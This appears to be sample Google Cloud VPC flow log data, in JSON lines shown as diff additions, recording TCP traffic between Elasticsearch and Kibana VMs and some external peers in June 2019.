+{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
+{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"67.43.156.13","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"67.43.156.13","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
+{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project",
"subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"67.43.156.13","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"67.43.156.13","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"67.43.156.13","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-projec
t","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
+{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"67.43.156.14","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
